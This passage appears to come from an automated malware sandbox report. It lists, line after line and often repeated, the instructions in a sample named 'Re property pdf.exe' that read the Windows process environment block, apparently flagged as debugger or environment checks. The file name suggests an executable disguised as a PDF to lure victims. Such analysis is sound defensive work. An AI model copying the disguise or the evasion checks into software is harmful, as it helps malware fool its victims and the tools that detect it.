            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102A470 mov eax, dword ptr fs:[00000030h]6_2_0102A470
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010BA49A mov eax, dword ptr fs:[00000030h]6_2_010BA49A
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010064AB mov eax, dword ptr fs:[00000030h]6_2_010064AB
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010344B0 mov ecx, dword ptr fs:[00000030h]6_2_010344B0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108A4B0 mov eax, dword ptr fs:[00000030h]6_2_0108A4B0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010004E5 mov ecx, dword ptr fs:[00000030h]6_2_010004E5
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103C700 mov eax, dword ptr fs:[00000030h]6_2_0103C700
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01000710 mov eax, dword ptr fs:[00000030h]6_2_01000710
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01030710 mov eax, dword ptr fs:[00000030h]6_2_01030710
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103C720 mov eax, dword ptr fs:[00000030h]6_2_0103C720
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103C720 mov eax, dword ptr fs:[00000030h]6_2_0103C720
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107C730 mov eax, dword ptr fs:[00000030h]6_2_0107C730
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103273C mov eax, dword ptr fs:[00000030h]6_2_0103273C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103273C mov ecx, dword ptr fs:[00000030h]6_2_0103273C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103273C mov eax, dword ptr fs:[00000030h]6_2_0103273C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103674D mov esi, dword ptr fs:[00000030h]6_2_0103674D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103674D mov eax, dword ptr fs:[00000030h]6_2_0103674D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103674D mov eax, dword ptr fs:[00000030h]6_2_0103674D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01000750 mov eax, dword ptr fs:[00000030h]6_2_01000750
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042750 mov eax, dword ptr fs:[00000030h]6_2_01042750
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042750 mov eax, dword ptr fs:[00000030h]6_2_01042750
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108E75D mov eax, dword ptr fs:[00000030h]6_2_0108E75D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01084755 mov eax, dword ptr fs:[00000030h]6_2_01084755
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01008770 mov eax, dword ptr fs:[00000030h]6_2_01008770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010770 mov eax, dword ptr fs:[00000030h]6_2_01010770
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A678E mov eax, dword ptr fs:[00000030h]6_2_010A678E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B47A0 mov eax, dword ptr fs:[00000030h]6_2_010B47A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010007AF mov eax, dword ptr fs:[00000030h]6_2_010007AF
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100C7C0 mov eax, dword ptr fs:[00000030h]6_2_0100C7C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010807C3 mov eax, dword ptr fs:[00000030h]6_2_010807C3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108E7E1 mov eax, dword ptr fs:[00000030h]6_2_0108E7E1
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010227ED mov eax, dword ptr fs:[00000030h]6_2_010227ED
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010227ED mov eax, dword ptr fs:[00000030h]6_2_010227ED
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010227ED mov eax, dword ptr fs:[00000030h]6_2_010227ED
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010047FB mov eax, dword ptr fs:[00000030h]6_2_010047FB
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010047FB mov eax, dword ptr fs:[00000030h]6_2_010047FB
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101260B mov eax, dword ptr fs:[00000030h]6_2_0101260B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101260B mov eax, dword ptr fs:[00000030h]6_2_0101260B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101260B mov eax, dword ptr fs:[00000030h]6_2_0101260B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101260B mov eax, dword ptr fs:[00000030h]6_2_0101260B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101260B mov eax, dword ptr fs:[00000030h]6_2_0101260B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101260B mov eax, dword ptr fs:[00000030h]6_2_0101260B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101260B mov eax, dword ptr fs:[00000030h]6_2_0101260B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107E609 mov eax, dword ptr fs:[00000030h]6_2_0107E609
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01042619 mov eax, dword ptr fs:[00000030h]6_2_01042619
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01036620 mov eax, dword ptr fs:[00000030h]6_2_01036620
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01038620 mov eax, dword ptr fs:[00000030h]6_2_01038620
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101E627 mov eax, dword ptr fs:[00000030h]6_2_0101E627
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100262C mov eax, dword ptr fs:[00000030h]6_2_0100262C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101C640 mov eax, dword ptr fs:[00000030h]6_2_0101C640
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010C866E mov eax, dword ptr fs:[00000030h]6_2_010C866E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010C866E mov eax, dword ptr fs:[00000030h]6_2_010C866E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103A660 mov eax, dword ptr fs:[00000030h]6_2_0103A660
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103A660 mov eax, dword ptr fs:[00000030h]6_2_0103A660
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01032674 mov eax, dword ptr fs:[00000030h]6_2_01032674
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01004690 mov eax, dword ptr fs:[00000030h]6_2_01004690
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01004690 mov eax, dword ptr fs:[00000030h]6_2_01004690
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103C6A6 mov eax, dword ptr fs:[00000030h]6_2_0103C6A6
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010366B0 mov eax, dword ptr fs:[00000030h]6_2_010366B0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103A6C7 mov ebx, dword ptr fs:[00000030h]6_2_0103A6C7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103A6C7 mov eax, dword ptr fs:[00000030h]6_2_0103A6C7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107E6F2 mov eax, dword ptr fs:[00000030h]6_2_0107E6F2
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107E6F2 mov eax, dword ptr fs:[00000030h]6_2_0107E6F2
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107E6F2 mov eax, dword ptr fs:[00000030h]6_2_0107E6F2
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107E6F2 mov eax, dword ptr fs:[00000030h]6_2_0107E6F2
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010806F1 mov eax, dword ptr fs:[00000030h]6_2_010806F1
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010806F1 mov eax, dword ptr fs:[00000030h]6_2_010806F1
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107E908 mov eax, dword ptr fs:[00000030h]6_2_0107E908
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107E908 mov eax, dword ptr fs:[00000030h]6_2_0107E908
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108C912 mov eax, dword ptr fs:[00000030h]6_2_0108C912
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108892A mov eax, dword ptr fs:[00000030h]6_2_0108892A
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0109892B mov eax, dword ptr fs:[00000030h]6_2_0109892B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D4940 mov eax, dword ptr fs:[00000030h]6_2_010D4940
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01080946 mov eax, dword ptr fs:[00000030h]6_2_01080946
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01026962 mov eax, dword ptr fs:[00000030h]6_2_01026962
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01026962 mov eax, dword ptr fs:[00000030h]6_2_01026962
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01026962 mov eax, dword ptr fs:[00000030h]6_2_01026962
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0104096E mov eax, dword ptr fs:[00000030h]6_2_0104096E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0104096E mov edx, dword ptr fs:[00000030h]6_2_0104096E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0104096E mov eax, dword ptr fs:[00000030h]6_2_0104096E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A4978 mov eax, dword ptr fs:[00000030h]6_2_010A4978
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A4978 mov eax, dword ptr fs:[00000030h]6_2_010A4978
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108C97C mov eax, dword ptr fs:[00000030h]6_2_0108C97C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010129A0 mov eax, dword ptr fs:[00000030h]6_2_010129A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010009AD mov eax, dword ptr fs:[00000030h]6_2_010009AD
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010009AD mov eax, dword ptr fs:[00000030h]6_2_010009AD
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010889B3 mov esi, dword ptr fs:[00000030h]6_2_010889B3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010889B3 mov eax, dword ptr fs:[00000030h]6_2_010889B3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010889B3 mov eax, dword ptr fs:[00000030h]6_2_010889B3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010969C0 mov eax, dword ptr fs:[00000030h]6_2_010969C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A9D0 mov eax, dword ptr fs:[00000030h]6_2_0100A9D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A9D0 mov eax, dword ptr fs:[00000030h]6_2_0100A9D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A9D0 mov eax, dword ptr fs:[00000030h]6_2_0100A9D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A9D0 mov eax, dword ptr fs:[00000030h]6_2_0100A9D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A9D0 mov eax, dword ptr fs:[00000030h]6_2_0100A9D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A9D0 mov eax, dword ptr fs:[00000030h]6_2_0100A9D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010349D0 mov eax, dword ptr fs:[00000030h]6_2_010349D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010CA9D3 mov eax, dword ptr fs:[00000030h]6_2_010CA9D3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108E9E0 mov eax, dword ptr fs:[00000030h]6_2_0108E9E0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010329F9 mov eax, dword ptr fs:[00000030h]6_2_010329F9
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010329F9 mov eax, dword ptr fs:[00000030h]6_2_010329F9
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108C810 mov eax, dword ptr fs:[00000030h]6_2_0108C810
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A483A mov eax, dword ptr fs:[00000030h]6_2_010A483A
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A483A mov eax, dword ptr fs:[00000030h]6_2_010A483A
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103A830 mov eax, dword ptr fs:[00000030h]6_2_0103A830
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01022835 mov eax, dword ptr fs:[00000030h]6_2_01022835
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01022835 mov eax, dword ptr fs:[00000030h]6_2_01022835
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01022835 mov eax, dword ptr fs:[00000030h]6_2_01022835
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01022835 mov ecx, dword ptr fs:[00000030h]6_2_01022835
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01022835 mov eax, dword ptr fs:[00000030h]6_2_01022835
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01022835 mov eax, dword ptr fs:[00000030h]6_2_01022835
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01012840 mov ecx, dword ptr fs:[00000030h]6_2_01012840
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01030854 mov eax, dword ptr fs:[00000030h]6_2_01030854
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01004859 mov eax, dword ptr fs:[00000030h]6_2_01004859
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01004859 mov eax, dword ptr fs:[00000030h]6_2_01004859
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01096870 mov eax, dword ptr fs:[00000030h]6_2_01096870
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01096870 mov eax, dword ptr fs:[00000030h]6_2_01096870
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108E872 mov eax, dword ptr fs:[00000030h]6_2_0108E872
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108E872 mov eax, dword ptr fs:[00000030h]6_2_0108E872
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01000887 mov eax, dword ptr fs:[00000030h]6_2_01000887
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108C89D mov eax, dword ptr fs:[00000030h]6_2_0108C89D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E8C0 mov eax, dword ptr fs:[00000030h]6_2_0102E8C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D08C0 mov eax, dword ptr fs:[00000030h]6_2_010D08C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FF8918 mov eax, dword ptr fs:[00000030h]6_2_00FF8918
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FF8918 mov eax, dword ptr fs:[00000030h]6_2_00FF8918
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010CA8E4 mov eax, dword ptr fs:[00000030h]6_2_010CA8E4
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103C8F9 mov eax, dword ptr fs:[00000030h]6_2_0103C8F9
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103C8F9 mov eax, dword ptr fs:[00000030h]6_2_0103C8F9
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D4B00 mov eax, dword ptr fs:[00000030h]6_2_010D4B00
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107EB1D mov eax, dword ptr fs:[00000030h]6_2_0107EB1D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107EB1D mov eax, dword ptr fs:[00000030h]6_2_0107EB1D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107EB1D mov eax, dword ptr fs:[00000030h]6_2_0107EB1D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107EB1D mov eax, dword ptr fs:[00000030h]6_2_0107EB1D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107EB1D mov eax, dword ptr fs:[00000030h]6_2_0107EB1D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107EB1D mov eax, dword ptr fs:[00000030h]6_2_0107EB1D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107EB1D mov eax, dword ptr fs:[00000030h]6_2_0107EB1D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107EB1D mov eax, dword ptr fs:[00000030h]6_2_0107EB1D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107EB1D mov eax, dword ptr fs:[00000030h]6_2_0107EB1D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102EB20 mov eax, dword ptr fs:[00000030h]6_2_0102EB20
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102EB20 mov eax, dword ptr fs:[00000030h]6_2_0102EB20
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010C8B28 mov eax, dword ptr fs:[00000030h]6_2_010C8B28
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010C8B28 mov eax, dword ptr fs:[00000030h]6_2_010C8B28
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B4B4B mov eax, dword ptr fs:[00000030h]6_2_010B4B4B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B4B4B mov eax, dword ptr fs:[00000030h]6_2_010B4B4B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A8B42 mov eax, dword ptr fs:[00000030h]6_2_010A8B42
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01096B40 mov eax, dword ptr fs:[00000030h]6_2_01096B40
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01096B40 mov eax, dword ptr fs:[00000030h]6_2_01096B40
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010CAB40 mov eax, dword ptr fs:[00000030h]6_2_010CAB40
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AEB50 mov eax, dword ptr fs:[00000030h]6_2_010AEB50
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D2B57 mov eax, dword ptr fs:[00000030h]6_2_010D2B57
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D2B57 mov eax, dword ptr fs:[00000030h]6_2_010D2B57
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D2B57 mov eax, dword ptr fs:[00000030h]6_2_010D2B57
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D2B57 mov eax, dword ptr fs:[00000030h]6_2_010D2B57
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B4BB0 mov eax, dword ptr fs:[00000030h]6_2_010B4BB0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B4BB0 mov eax, dword ptr fs:[00000030h]6_2_010B4BB0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010BBE mov eax, dword ptr fs:[00000030h]6_2_01010BBE
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010BBE mov eax, dword ptr fs:[00000030h]6_2_01010BBE
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01020BCB mov eax, dword ptr fs:[00000030h]6_2_01020BCB
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01020BCB mov eax, dword ptr fs:[00000030h]6_2_01020BCB
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01020BCB mov eax, dword ptr fs:[00000030h]6_2_01020BCB
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01000BCD mov eax, dword ptr fs:[00000030h]6_2_01000BCD
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01000BCD mov eax, dword ptr fs:[00000030h]6_2_01000BCD
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01000BCD mov eax, dword ptr fs:[00000030h]6_2_01000BCD
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AEBD0 mov eax, dword ptr fs:[00000030h]6_2_010AEBD0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01008BF0 mov eax, dword ptr fs:[00000030h]6_2_01008BF0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01008BF0 mov eax, dword ptr fs:[00000030h]6_2_01008BF0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01008BF0 mov eax, dword ptr fs:[00000030h]6_2_01008BF0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108CBF0 mov eax, dword ptr fs:[00000030h]6_2_0108CBF0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102EBFC mov eax, dword ptr fs:[00000030h]6_2_0102EBFC
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108CA11 mov eax, dword ptr fs:[00000030h]6_2_0108CA11
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103CA24 mov eax, dword ptr fs:[00000030h]6_2_0103CA24
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102EA2E mov eax, dword ptr fs:[00000030h]6_2_0102EA2E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01024A35 mov eax, dword ptr fs:[00000030h]6_2_01024A35
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01024A35 mov eax, dword ptr fs:[00000030h]6_2_01024A35
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01006A50 mov eax, dword ptr fs:[00000030h]6_2_01006A50
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01006A50 mov eax, dword ptr fs:[00000030h]6_2_01006A50
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01006A50 mov eax, dword ptr fs:[00000030h]6_2_01006A50
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01006A50 mov eax, dword ptr fs:[00000030h]6_2_01006A50
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01006A50 mov eax, dword ptr fs:[00000030h]6_2_01006A50
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01006A50 mov eax, dword ptr fs:[00000030h]6_2_01006A50
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01006A50 mov eax, dword ptr fs:[00000030h]6_2_01006A50
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010A5B mov eax, dword ptr fs:[00000030h]6_2_01010A5B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010A5B mov eax, dword ptr fs:[00000030h]6_2_01010A5B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AEA60 mov eax, dword ptr fs:[00000030h]6_2_010AEA60
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103CA6F mov eax, dword ptr fs:[00000030h]6_2_0103CA6F
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103CA6F mov eax, dword ptr fs:[00000030h]6_2_0103CA6F
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103CA6F mov eax, dword ptr fs:[00000030h]6_2_0103CA6F
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107CA72 mov eax, dword ptr fs:[00000030h]6_2_0107CA72
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0107CA72 mov eax, dword ptr fs:[00000030h]6_2_0107CA72
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100EA80 mov eax, dword ptr fs:[00000030h]6_2_0100EA80
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100EA80 mov eax, dword ptr fs:[00000030h]6_2_0100EA80
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100EA80 mov eax, dword ptr fs:[00000030h]6_2_0100EA80
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100EA80 mov eax, dword ptr fs:[00000030h]6_2_0100EA80
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100EA80 mov eax, dword ptr fs:[00000030h]6_2_0100EA80
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100EA80 mov eax, dword ptr fs:[00000030h]6_2_0100EA80
